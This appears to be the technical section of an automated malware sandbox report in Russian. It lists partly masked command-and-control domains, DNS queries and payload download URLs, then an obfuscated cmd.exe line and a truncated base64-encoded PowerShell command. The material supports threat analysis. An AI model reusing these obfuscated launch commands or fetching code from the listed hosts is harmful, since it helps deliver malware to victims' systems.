Техническая информация
- '<SYSTEM32>\cmd.exe' GqGMMjv EKXmaYwhWwrOpmdirGUNBAhoQcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FUvEwAwEPzPLEdi%=ZaaCJqzKwd&&set %TXJMuwHzzASw%=p&&set %brpjFicY%=o^w&...
- 'mo###izr.com':443
- 'hy######usedcoaching.com':80
- 'hy######usedcoaching.com':443
- 'pk#.goog':80
- 'lo######eclayshooting.co.uk':443
- 'ma##k.in':80
- 'we####kirchner.de':80
- http://hy######usedcoaching.com/ACTV/
- http://pk#.goog/gsr1/gsr1.crt
- http://ma##k.in/zFGf9/
- http://we####kirchner.de/trkxe/
- 'mo###izr.com':443
- 'hy######usedcoaching.com':443
- 'lo######eclayshooting.co.uk':443
- DNS ASK mo###izr.com
- DNS ASK hy######usedcoaching.com
- DNS ASK pk#.goog
- DNS ASK lo######eclayshooting.co.uk
- DNS ASK ma##k.in
- DNS ASK we####kirchner.de
- '<SYSTEM32>\cmd.exe' GqGMMjv EKXmaYwhWwrOpmdirGUNBAhoQcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FUvEwAwEPzPLEdi%=ZaaCJqzKwd&&set %TXJMuwHzzASw%=p&&set %brpjFicY%=o^w&...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAGUAbgBWADoAYwBPAE0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoATwBpAG4AJwAnACkAKABuAEUAVwAtAG8AQgBKAEUAQwBUACAAIABzAFkAUwBUAGUAbQAuAEkAbwAuAEMAbwBtAFAAcgBlAHMAcwBJAE8ATgAuAEQARQBmAE...